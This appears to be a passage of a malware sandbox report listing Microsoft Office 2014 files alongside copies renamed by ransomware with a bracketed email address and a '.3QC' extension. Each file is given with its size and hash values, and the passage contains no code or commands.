C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck.css_[[email protected]].3QC

Filesize
3KB

MD5
c67e1aab1c2998af4d0d0f067a56e1db

SHA1
05b844dd6ceeb6e04cdccca57d7595c5b85f1331

SHA256
06214a04ed918c58b56804512c1a76081b64666bd5ac6f1bb9cd999c26a1df42

SHA512
4deab63cb6680ce3761865b3b9c6e657ac92d562d0a83418e453074bbeef419d625822aacce2151a74a9bb7bbc6d9f745defba382051cc9e129ea79feeb7d381

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Generic.css

Filesize
1KB

MD5
a69dbe5ae66b5f4faaa6200b27ae3d56

SHA1
5d5f28cb51d95df48e1db18cbc1c7f59960c9822

SHA256
a95bbfd392891a5c1a2f383fbeab9bcbc80653ade11df09589b5ee12181e822b

SHA512
7cdaa98c78c206a422148f21e2a349477a314512790949a9f71021bf59fc3025a163e7d50acaa6ff8aa798076a9c4b494190fa0e4bd71502faf5148572555183

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Generic.css_[[email protected]].3QC

Filesize
1KB

MD5
07d35aefd7b548ed0151dfb45b827225

SHA1
314da994588134754839e0e40a9bfa60446b3b4d

SHA256
d15cc756c4b8371da9d982a9289a7eec3305b9dd5786faf7a7cba8b59dac4177

SHA512
307b3dcad5a88d98e7a5f0bf96f9e2a29dd05deb25afa35da24d40e1169e369552332fad0f6bfefa495eba0bae96655f088948be8a028994319dcffcb75eaa8c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH.HXS_[[email protected]].3QC

Filesize
1.5MB

MD5
797825dcecd1680a49778ad9fbc3ddf2

SHA1
b0a08a4273c65fbcddb23bb5e5e9de0cb052ec6f

SHA256
22c4d2fd8422930c07a42eb9f4eae1e846ce06083b4b66d28050904f439eaa2e

SHA512
ab513c01df8fef3c01b490c00aa86c99ce68406b0fb2f728976a25696220192a842ec999743068ade26552e405a8afe09a1dc92f46dba521ae031db2effc2080

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV.HXS_[[email protected]].3QC

Filesize
10.2MB

MD5
b03cbe29cc560ab02b8ce6c548e03bed

SHA1
245a605991a4372d7325e776b47cf98b5b4aff80

SHA256
1dbc6d297aad3c1bdde83b17b2dda632ed60843b4b3361c7818e97dbf34571e1

SHA512
bfe99552ca78d968d0ca88a695155d4487770bded188d37e3595190b4b6905213e93783a29661b64286a9542360287df7e5058e897b171d5c8917516cb3e7161

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.HXS_[[email protected]].3QC

Filesize
3.7MB

MD5
ef2bf32aedc367e5ca47ecef45b20bb4

SHA1
5bbddb10991d75618f2e7be3034f06474840a6d7

SHA256
66f3f2385496906a5b6bb443f45b01e651de59656985026a32efb15ffb3e86fb

SHA512
f1f6d3e558d9399e24698c9b52a39f55c949b4ac577ab974cad891325a7916754ae76943376c38d6c56f51cb6a56e913599b167c5e91eff10f39e05019f4a579

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.DEV.HXS_[[email protected]].3QC

Filesize
4.5MB

MD5
3d1f668cdef7f561c78a9dbef37a8ecf

SHA1
e159980373858192ffad4f668c3fec29e229b887

SHA256
7398e380f597d52abda00b0fb45bbebbabffeafcfc749cd62571b66679e388c9

SHA512
0d2c008d021a1838cceb86e6f2c3fbab051cec374df48bedcc461f83171d64f502083beb4c58e4a32d889eff88b05590744770e2558641cdbbe3520eb3eccae1

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE.HXS_[[email protected]].3QC

Filesize
1.7MB

MD5
787c53b6b8f3ff516b6c29cce8f56ebc

SHA1
d5fdb688598b0700cb548e0e1739329011f8ce4a

SHA256
54b57659e4931428490db997dadd358f07ab32a20c853c8b560605e7f649a9df

SHA512
8b73c623bb63d8338f1cc3472f8b93dc7f203fe965ba939ab6981da8bf39ae54e9e3499e8b53c0205dbc8aa55e37f7dd8b70017c4755a6ec2e911cfce332f55c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\ONGuide.onepkg_[[email protected]].3QC

Filesize
1.3MB

MD5
14d79ccda22a0e29c6cacdc580b338e1

SHA1
5949849187ec09a1419e996029ec0f4fa18ef140

SHA256
70c980d8f469380dacb2d3085721a6f65e0905bc9f4602a4c76cdc8063457f89

SHA512
43878d27c7b15b50e5df6564aca8028aa4863c783fc115ed0d377ce595d3d10e3e62e57203290433664b23bd42e271c916bd90d213553b42abe8a1b1e95e49cb

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK.DEV.HXS_[[email protected]].3QC

Filesize
6.7MB

MD5
da46ef73446701782c055c0f1f8918c8

SHA1
fd81d574981a2e40db406ef4d05e7e70719a8ddf

SHA256
631f02682e410e4fed2f4b3e600a9ec324b804899d6167d69e33dcd1c935a91c

SHA512
16ec3a345ebc56956760474badf77f52eb9c94e967d7bd1b806a64a15e729f1159296d72111dee716058222de43105fbf045d79470870e4b9aa354cede77e910

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK.HOL_[[email protected]].3QC

Filesize
1.2MB

MD5
050cbc7220eba068b5c9b83910b3b13b

SHA1
ebd130774a3707c69459fa67e578029788ef38f5

SHA256
218f1249d884758c2e4435bf4edc76682b0126077bd4d455e5e984702aaacf26

SHA512
6f3e78a547aa69c7c82516d4a24a0eadae1ae3bb7f03ab6d9f10e0ad6a240c91c3486b2b48e4a47a99334d995939a8d397d0f4bf821e35a1b98e5cc2daca5640

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK.HXS_[[email protected]].3QC

Filesize
4.8MB

MD5
b911de473f5ec8be24bb382df67a8cf6

SHA1
e5300d870be2a93e9b68237c07daed2d37bfce12

SHA256
bb46a033d8d152e91abda6597ac3a92c01ebdd9ec3ac88ed213c0f7a6e979e19

SHA512
bbd28bac410fd4f02fce69acc5ae60764b3966bc1f3b59d7448b5e55c06482e967d80c1ca0d30f45afa71aeb57176ac2a7c9d2102cb858a4f94daba4c2e1e7fb

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT.DEV.HXS_[[email protected]].3QC

Filesize
4.8MB

MD5
f0c76f56a7cbc69006c6d4aedfdea6e2

SHA1
e4e1f7d185fe26c7d5127afcf198bd6a21b6e26a

SHA256
85f6a95e5f3d8dedde5d6b971f6556eb6ab67a9a259df9ac156a2e019a1182dc

SHA512
7b8035da4a843d72b004e9a862f70c6b441dc73777a2dc176d92ea7b1eb3d2c02d5d7dbe319a0aaa565f7c7ce219ef1870889badbfa34fec5aedac3596539e6b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT.HXS_[[email protected]].3QC

Filesize
6.5MB

MD5
bbe0425006c5ce85448c4006dff485a7

SHA1
d90925b845ea3d73687d8609b71b06aa0f002723

SHA256
9165ba47141d7fc1b4b92287c0c82c8c12dcbe9cf1688998f958e538abe7c728

SHA512
feef85698ac75179f2a0bc00d6df1d7b77b5991b00b4f10231b7b2e9175019da52507dcfbb02b8477b7c985228ea01893b6cf819d7db4a79aaa0b627f83abb86

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT_[[email protected]].3QC

Filesize
2.0MB

MD5
8bc08ecdeaecf5c96c0dac2d10fcc44b

SHA1
d247000f51c8ae2f7b1b8f3ba15e76509243aa57

SHA256
769901cd461f69cef0e6f06d3e879c05839c4da5ff0c6bf24dab0530f498eef0

SHA512
52ca2d1d4b0a62e42bb2d70387bd036302bba4575b72dd4e9031545b5827425884b503c4cb1b57642b82370c94091f082ba4ae858506723c39d0e02fd778e480

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT

Filesize
10.0MB

MD5
48335c27de3f6b5560251c8eb0963a1b

SHA1
74566ab78a9bbafd2811bda56531bdb91f175610

SHA256
8a872f2ee5604b771daf571e96ffa9b4b7834405df58f9b709b905d3eabcf78a

SHA512
52db5201dbd6719f9a9be0b8afdea9811b86e2a4eea1e5ff393e18455d32a1d8547d2876f488aff998ff31a8bce0c57c41e038ec989bc110e72dca091819223a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT_[[email protected]].3QC

Filesize
10.0MB

MD5
74a41f9057ca3b28b8736ed3e733577b

SHA1
620fd979bf2d268e9bba2216bad50ead9d4602ee

SHA256
3a5725865624987832fa0cba90c3d467dcd217c835240c0ef72634fd05cc0cdd

SHA512
a51a056422cf2c8c845a525e3e439c74f79174893112f7632bbf9ec2d741a1ddbc3237c60e7df2a551833eb50cdc7404f2024231608d902eeff4eced7de838d5

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Classic.dotx

Filesize
8KB

MD5
5ae4674313912240088d43ab1a384621

SHA1
8ef921b36f75326609c2212e0fed25ccf5bf72dd

SHA256
e965c73a771dbf02d861c223aa199c8770d1540b2853ecff5c3901b3cb2c1285

SHA512
cabfa36c79cabbb086d1cb2eb1ff8b9fed55eea0ab685ad1b8404c9bacab5153de90ca5c8c96f319123545ed977495b2393a3fb26ed6ef93670ce8d1930212b6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Classic.dotx_[[email protected]].3QC

Filesize
9KB

MD5
e95f02f6cd1a716ab75a7146f2a0e863

SHA1
d73528ad54d73d1df8282c059758b6258f4190f2

SHA256
c2515008cb2da463031e2120906265753891e787ba36643c6dee4fbe816a8db7

SHA512
82dc5adda2d1166b1e13a017a88df1bb9068b8f5dfc86449e9fb6ecb7907b544f3bf931fffd6906cc99156100cf029d32de651c850a3b3749112e086dcc39bf0

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Default.dotx

Filesize
8KB

MD5
4e236c64f1b16f2b82f82a4b555fe8f3

SHA1
4d58ac0c964acf8255ca418fa64f3df9996fd774

SHA256
f9a91e52c577f49a1fddcb600f2601e8f69a4bcd0ac80801f3a36b6200878a30

SHA512
aec37eebaab30b1aab5343bcc23a359ee1b50d8f15855d4b175aa8f94481201cf37b4f1bf7fdf071cb0f33e70f0c4ecd009aa25f84aa4898881d378474b9fe19

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Default.dotx_[[email protected]].3QC

Filesize
9KB

MD5
ec3134248dace1f66bb41b46d1e6a8b4

SHA1
9e97052137359ee6625ecfd22cb8159d22a90ebd

SHA256
42538270596b0f84c91227b5fa5bbb1065a196ad4d506ed975a56959406b403d

SHA512
874d3301453b8fe4ca8ebb0b0821a5cd738c857e4932dcbc9aa8b6250c7b8d014b105374acc27fca7a006a85a136f5b6eb35e39b5cd95be44fd9e315b6aee61e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\DefaultBlackAndWhite.dotx_[[email protected]].3QC

Filesize
8KB

MD5
080362f6c666da6b72557d0a67f0a7aa

SHA1
1039475126f67618a66abcaa934fc78e429cda3c

SHA256
b20d000117b6efa1d9bd0fbda6529d595ce137bff48d866f9e02882ad1108a2f

SHA512
9cd025d47e6c01c95b4acb814f4e393d4672cf8b3b1a1e0aa4cc3130b6f4055efc70b3ae1e5eaa4c7524dac1663ef54983791c861dd3528b9806abc9e6fc6e67

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\RPLBRF35.CHM

Filesize
48KB

MD5
96390828eacaf376747035f937e6d539

SHA1
f17a36886894b93730ad7fbfd238dba6b8c2ec49

SHA256
98c0395b3aac482c916a06fd3ce7ed50a473a2c52cee2646c4578247c5ba5b35

SHA512
53e9883ce2503e4dbce72301968d73c7c386189260e5600046939cf515d7208a2626267ad7d5507a0aa1da8059cab594f0290169886ab7f3594abec4a8acf3ab

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\RPLBRF35.CHM_[[email protected]].3QC

Filesize
48KB

MD5
6c5b7ec73570e82a910bcf796b87539a

SHA1
f5837dd37510b19ca1dac597b954e04dc4a175ed

SHA256
ed4ffaa838c9e1ef5ecffe9ed3055cc30affe65e4324fd972a831cd914b3cdf4

SHA512
5866cde19fb5bf28893ce716133e01d554735aa6bc93e1e65e178ab70beec1835fef38174a940183f66779018919e0fd25f5eef7bdf6040b97977bef0eee1059

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG.HXS

Filesize
388KB

MD5
4c2941bb5bf99a0df43b78feef599fd6

SHA1
f3b75e4700b97117037b8567109338864cf971f6

SHA256
31ef5151170a9b930b23058a6ea9ca8ae213c56d05dfd6bc824a9761310bec46

SHA512
9b07f59933cb20fe5cffa10d57d243d214fc6d90ffd594647939a35430503b814302f35f90ef3297f5af8d493dc76182734dcf97020b6e7a1f8ebc6e681b3a59

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG.HXS_[[email protected]].3QC

Filesize
388KB

MD5
c9ebe3698023815567fd5e0ad93f249b

SHA1
4341beb5d54d18684a9de76951eb2d6ea791c4c6

SHA256
a4bf2f38f1c9813454b131629e15d0a9237bcd2f861ac7015bd6c35798f0dde5

SHA512
b2c0ef06637de3ef72b7c77e4399b914f57818f9cd9dc1b84855dba89230ba7fe89be3c2f3773f7e27c9d8d01068ca19d4c5aba5ece0925728db856908946b13

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\STSLIST.CHM_[[email protected]].3QC

Filesize
423KB

MD5
63d347113eb3e4f2177a2498a6fdea47

SHA1
0b7b1f4c1e428c6e017f11c50a0170cbf13341fa

SHA256
779a137149f715aeeb20ce92f7d783280d1e764d4b707504282d33321168a534

SHA512
d854eabe262f07334b1b5540598d23dcddf745b694c9d53e1679a198f3f9f05a38cf4de1da27c39bbce3804312e50a24654b47387988096648da20283a60dce3

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\VBAOWS10.CHM_[[email protected]].3QC

Filesize
260KB

MD5
9f5a2872aeae30ec08e7026155e0cbfa

SHA1
4d51ce89229d1077e7ccd42024e86a067ef12de3

SHA256
75cc95311aae60c4dd7061674331f5fbc24a56a6dd87d30cfaf81a6b2f7f340c

SHA512
d0418a16d1c699022098e92629966a5504d6cb990ae960626102a87fcd344caf0ff27193b8489111c87ce5026a1d89cb33b278e788178dc097d760304cb7d6a6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV.HXS

Filesize
7.1MB

MD5
043bb5cb8daf51853ba35bdd78785752

SHA1
794d20b72a3c9fd482c96c213bd3a2249a8e3865

SHA256
2974fa6d5a1a487a8686377c05808bad2eba63798252a9c194cf686b771b8f18

SHA512
2159d8bbdf1c383400633f8765f368493c89d72f51774d2852a93ab96eb781b4ee4a9588de7c5dda24042a87f86bd07997cc47eb4c7174e2b2cdda7b95107c53

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV.HXS_[[email protected]].3QC

Filesize
7.1MB

MD5
bf50583e2d5cc6f5b338bf2fc54a3b5c

SHA1
126ad2b04030123bd59bb6f3f03c199b972fd6b5

SHA256
ae449b144e048b7423250505ccbc930d0d6e78b473aae31df4cad051c7e3ab5d

SHA512
89e88baa5ece158106b68b8e728480e5c36585f60e65a9e553bc8375a5d081f5e86aa7bdcb8f74365a998b03fb4b77dedb45b5a8d5f8d731a0e2a6d52982e23c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.HXS_[[email protected]].3QC

Filesize
5.0MB

MD5
b356fb94285d65fa18d7c11096810058

SHA1
ce1a62c323689f4c1cba5065f550c4d0ab40bdf2

SHA256
343d429d282cdcc7140b30c57ab006d6d84deb044e2f437f007ae54a66f0747a

SHA512
b8c87e5c0d78690d23d1af0bc87e0304106e4f6b45e7684a520fe5943826da822354f5db464d07205ed629c05f1520705fa6fae5b3862f3d236837645df841b2

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\XMLSDK5.CHM

Filesize
3.3MB

MD5
640c212a8ab05e13ed0a4c8cdd6db647

SHA1
82e82b14dbcc5c0e70c96a54619d5b865c549b5a

SHA256
3c6b8bd3b666fabfffaf327ee1be317b2fac5453848897ad95d3bde2aab63613

SHA512
633b3a3c4765b83ffae7723066cc4d9e4c26411d366e520c96e8a9c827c7ad79038d70b278c61ba598dcc5b3332ce252a29fb3509e6715413e0a3a8d9d109c78

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\XMLSDK5.CHM_[[email protected]].3QC

Filesize
3.3MB

MD5
81faf8ef82f74dd6d44d6b3adb516695

SHA1
ee88319e4196b83888d53d2b13337606ee1ab086

SHA256
4296013c06b88a26e182a708f7681f95f780cb916114cab47d7efc33db20afc9

SHA512
6d886e1c5a2e165b6be2d4f0b2c24a29fc1a0f06538b40adb5c36bdcd54e94aab6e7d2db7c182c72acfefbc2777edd26594423f3549dd4d04c47b932af1f232b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZLIB.ACCDE

Filesize
1.7MB

MD5
837bfe4c8ab993535461d68d764e8c51

SHA1
a3c13091c7d1f4fb2b15931f20bd3928789afa25

SHA256
6e57617db4f14fa1bb0316da570ba98910de5ac99a83f1011feb5511f85be04c

SHA512
d2893472dccadc27461ce66b104ba36c5cce0cfac524e1f3553a47c59b2b28dac0f81db85f772f4e15ec68d14fa40421180becb9adb9c6cbd6194ba4143fb636

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZLIB.ACCDE_[[email protected]].3QC

Filesize
1.7MB

MD5
34dc8c651ef78a00e028f1825880c63a

SHA1
796d151c4903a6dea65526c933140bf62b6d9680

SHA256
a2dea5baab553b56ada336b68cc72550422f792da8391a46945a8e46a98266be

SHA512
b10ce26ce21ea79c2557eca29bfd60411e123a8111ea6aefbc5004c299b889ee6144d146b6b8693a0486cbc133b47c48b80cad7ab06fa11a4111ec5c06f4169c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZMAIN.ACCDE_[[email protected]].3QC

Filesize
7.9MB

MD5
fa33402beba86cb3d0b778085951ebeb

SHA1
b5fa419ba5e13b4e5357bb35c4f4841338fcbcf4

SHA256
1fa4a04000e7e9a3f56afe90f530236abb76e222e273eb067cfd489a498abcc0

SHA512
75e9b9fc5cbdde086ea33d650bcb56c9cbfe741e64517973f46c6de098666c384cc415d75bd377d8c833181a53624258c00c72c5ae2e70a9dd92aab5d5038f6a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZTOOL.ACCDE_[[email protected]].3QC

Filesize
9.4MB

MD5
c9a0813fa5fb5ed110155949fccf9dda

SHA1
2d62a37cf8df7e14d8a3d9c3b946fff25f06fab3

SHA256
a73afcbe6e136dac3655f7ecaaa701f5e7bb55049a1ecb203f683ba6480415aa

SHA512
9f88b4e390edb7d0d9b3c89008ac129b83709b2c74effc7fd1beaff013f31d6893e084644ad0047908a73881a38212403d12c9195b4bd1dae3aa7921e8c34397

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM_[[email protected]].3QC

Filesize
1KB

MD5
362bed3f5fb89404aeb2f75b39104474

SHA1
11a452358e1c86bec1fcc66f20bb8da87959afb4

SHA256
d89c96fffd280957f99ab33f192a5de0167d0274e2e7f9596f439d339fc0ce40

SHA512
3cec35cd8ffe2bec9194ea1f7ad76a38ca52851542839ed21a3a2f2fbf1ce2657c2bfdd79a41d66c05164e1ed210074ca6db0d15329e6f1551b7fa82b07ca72a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP_[[email protected]].3QC

Filesize
1KB

MD5
fb969a23ec2848bcafa7db96cbbf5a79

SHA1
00c41063908e9c183f0f2f6a182f52cb5d6852c7

SHA256
4fa87fb004bd3bc6ebca72712f1c81f95bb1ff71c88c96a209ed1399aa2602d8

SHA512
af7446fe3c7b23913ea5f993936bfefbae244f98bb6798a536fda95af35a87ed67146a57a82fd4496fe32ce0d0a5bf1836cbb1f022eec7dfe695ecd765d00868

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\Built-In Building Blocks.dotx_[[email protected]].3QC

Filesize
4.0MB

MD5
9a13bf04d87fff8dd039b5fcc4d14cef

SHA1
b9764bd891c5749334b2bd75174299894e56dfed

SHA256
fd7aef9a3c6b7d0c8beb6d7d9aa39c2bfe1e8e40317a8b43bc138772032e4bd1

SHA512
80fc1312a8dc743b1e8798eeb0095f79eb88cb490c10a00fcf5d050a6f8b8e372bdce2b261efeec18bb581f4c932f567f66bec6c9fa94f7daf5eb906713f46f5

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue.css

Filesize
3KB

MD5
6dd9fc2a88c3a6d1fc77dd1bf04a1c2c

SHA1
65d8b5d99dd0e31850617b12c9d585acdee9c8cd

SHA256
d04d67054752288cc15cee0ac3388feb46352306dd2130e688d21353a8855fcc

SHA512
0ae7b61dbb1e61600be043448981dc0f637a67807e2b0de65d76c1feb85cec2b62ede5933fb9ed6861cb054ac83058e32dd48fe5f8499cfff9645bdc64b181bf

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue.css_[[email protected]].3QC

Filesize
3KB

MD5
0c74c4a4636f194b05a8146a246289ac

SHA1
aeeebc35308c5aae3bcf1f03f2a6da3f03dcc734

SHA256
20853d99da079a9c902f7f32c5dbfcfaded3ff369008650c896c0f8aa887165d

SHA512
8ab5d017c07189e6f2921f63b845cb15908144d1013ca7547f0570421e27acd9b1fd4654364f844323761bb625a99a8d004b9d957dc7ab912f33620a64469b3c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsBrowserUpgrade.html

Filesize
2KB

MD5
70b96c5cdb2c30584944531b8214b992

SHA1
dd1debcecfee18a97af726bfa383ea5beeb11bb7

SHA256
8c80bb22725929856ffb5f68b936a93a39ef1ceae8895d12bc638220c6241c7c

SHA512
8e1093005f4ddd135f07211098caa645199536d46b5d3c1f0115a7d1bd7aab610e4302831014b5c343c9e9293e3fd4ec6de0e44baaa3dc115bee1838789716ff

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsBrowserUpgrade.html_[[email protected]].3QC

Filesize
2KB

MD5
c6db833369aa3f2c60b93958a7f91c09

SHA1
e01cc66db23063ea81faafc574fcff7043e73ed1

SHA256
bd774adf3b8f960fe5ca16a7283122f961e20bef96bc273bde1d42c32d51847f

SHA512
ee5a06150bced9c778b5852f33a0e9b45a55b8faaedb6bc53dcf5b0a1e80f316c74ec45eb2764e4f2274ba7044e4f99c3458f8f4aae644f543572704a7295e3e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange.css_[[email protected]].3QC

Filesize
4KB

MD5
a737b508a47c7ab555d753e4fe1ccd4e

SHA1
3925c8f2262f21f5ca909c82cf5acff588df1e80

SHA256
03beb246fe42b72a2650101e6f33c2e01c5202128926d9daa8a1fab202d0b22a

SHA512
45d13bc47a76e2820413595862f6c7befa25b8fcaae8e43bc7c1127f2f08107f75cde3d5937b28d96dca3429548deecc6b851bd741b7811f5f75e23cc661368a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css_[[email protected]].3QC

Filesize
2KB

MD5
7373a354153011c9a8a653c0bbeb7d2c

SHA1
e1ddbaa1c02d622bce23dfddc4cdeac769005bd5

SHA256
01851459bb759def0bd6770b764cfd27ea886530c76fff2e96ef330fe57839d7

SHA512
4504475997b996179ed311689768e7f36425adeef458a2cea123d84cdf594015770b3b610825fe5ba0aba72e682000a699548b9629b1b7f0f72073519869bb16

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SlateBlue.css

Filesize
1KB

MD5
17b9193547c77f7fdca3b817dfc70ff9

SHA1
441bb0882c50a68468d0d83f9c9ff687603b4fca

SHA256
dbf9753a7a5361e32f34ddee703fc8ac5d8be2372b379ad64276bdb04f109948

SHA512
d1c63d70c30d7df4b8bbac503434d29facc6d36cc03106b90078e9a2258f52d82220fe4fcde5d224e91eee00df5283fa46191a238439215a906d7fa6e46b4c22

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SlateBlue.css_[[email protected]].3QC

Filesize
2KB

MD5
5b3efe7b898338b728cedd3e53b6803f

SHA1
5db3ca1e4da05c37f2f37fe8a25d73319c5f77f3

SHA256
989519d795661ce16e65693e636297330e67eacddbd57e41354b4ac0bd32993c

SHA512
c7802426d69920bf0a20bf450dfa5301a7d9e2cf42508a8d2a67534c160e1bded95754106dd54c53340cf5573aebcc3055075ddb62a7f514dfae74c03f35ec48

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts.css

Filesize
2KB

MD5
ae83f303017a7f4f59544224b003f914

SHA1
3ad202a8d53f11e1d86241f92d8d82f8f7c99e01

SHA256
46e8b69a2172f23879005616c0f2576d37967c043740b8843dd9e42992d5bc25

SHA512
a60e40f3a627f5f95a31159ef452284a15a41667f54f75b5419699a74df28a2fd5f7f019ca8b37aa3459ebd27504b14711d7ab54e6281ef9afcb181fadb1b2ab

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts.css_[[email protected]].3QC

Filesize
2KB

MD5
6211e8fa962ed424c3d1b4e991b4a2f7

SHA1
7bf7e41b174ddf24c864ac718b406334e9401662

SHA256
33bafd52cab77447ecaee5577175024edb1532791fa8b9fb9a95f00cf75f33e3

SHA512
0b4eddf19a145ae684d50a011a903a78ddc08dc15e869d7539ddb8a9a31ede97ef8f89d82409ccdad4665df1e1f90d30846b8da97d5cebab555980694bf1a616

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBrowserUpgrade.html

Filesize
2KB

MD5
7026f4047ccd73e4310a048f11681766

SHA1
dc38e967c0662a451d194b76c5d0b8e84b05cbfe

SHA256
bfbec2b39484cddf11f235526a74172125ff973c9fa22b6acc303e89793723c1

SHA512
9067637c4206419705ecc5747b800e77017e1126c872cf9a684e806aaff2d4a3cf48901a3dbeffa42b08951ef60962376d893f5df440cf8ec4cf6c99bdcce73e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsPrintTemplate.html

Filesize
611B

MD5
54864a522ba9ed74affa466dacadccf0

SHA1
7277e8547876d4dab9dfa440f94899cea6d3c9cb

SHA256
e27e1307b079f234ace98a8841001e7498e377728b43b51fa02ffc669dc6a096

SHA512
ae832f0e07a0ce0c966eb614a982b57b720c997570fbd8156d4874f83210bb37db6123fcec9f1a41f16f7342b8a99fa0f8bb26fa7ebe332c69afc955882de679

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsPrintTemplate.html_[[email protected]].3QC

Filesize
873B

MD5
cc341c6df911470606b93dde68d38fed

SHA1
9b0e0e8b10ff76c1ff69de279aa8797608759666

SHA256
23e8153b75eaa2223e0e6f78e20a86118a24b77efd606650fa0ead67bd2e5841

SHA512
90231bd60d4c05472c85b0d332ea4acb02d144c243cf45751808a5cec378ef2fe34e8455ab24fcbe6e149daad5e489f15b3b6764ffb23a5e7c13cb3d88a81e92

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml_[[email protected]].3QC

Filesize
247KB

MD5
da77b8d01c0cafee6e37df6521e06ed6

SHA1
974b2983b300a0a3c1ff1331010567a32dec664b

SHA256
5d8d97bf39963e9270e3b0aa7d31e46cb8453be19b89a1c7347b4c3ed152901f

SHA512
e99eaf0b2bf1149ea4627ff9da9605a77604c22f6d54e3bdb8e15c8e11da919f3f37bad3d7d86cbbd8383e12d34b2e6f5e41289648c5217166f4f75428c623d2

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL002.XML_[[email protected]].3QC

Filesize
1.4MB

MD5
823e0f1fdb4b80c8924e379b69ae6af8

SHA1
eac92990d38fb491eb90481423a8d4bf6a6fec9f

SHA256
9bdce762353f0e6bf1f34458b2192309bd2c07f1470c4e7ad3282ba95ee21703

SHA512
8b7f2076437b3406bf23b14ce40fe273e6064bd32208dea88f36e3ff9fa596f8d8852b7d5bcbeb0b3604da875588f80f8b702ec61b28cbba0b30179355800402

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN081.XML_[[email protected]].3QC

Filesize
1.0MB

MD5
cf0dc8c33f3b6f2c64f59f202fac8e72

SHA1
0fdff0a67472ba071ccaffef141bbb49b983a812

SHA256
381df75423158550aa4145ad5cb2df5a94e3a2d785e5941df086c734d7f04651

SHA512
a92b3f7ea86cc5aeb4f3afd680ec1cf69c32500fca5d596f852197e0fbd709731949abb40f3db9fa2f4ab9df84a263a2333495b2be8d4f95ad2af6d987ec4dd6

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Assets.accdt_[[email protected]].3QC

Filesize
1012KB

MD5
101237d7274f1a871fd2f984114384bb

SHA1
b5d3c4c1bba7793299b71e08ba3a5b49fd0260c4

SHA256
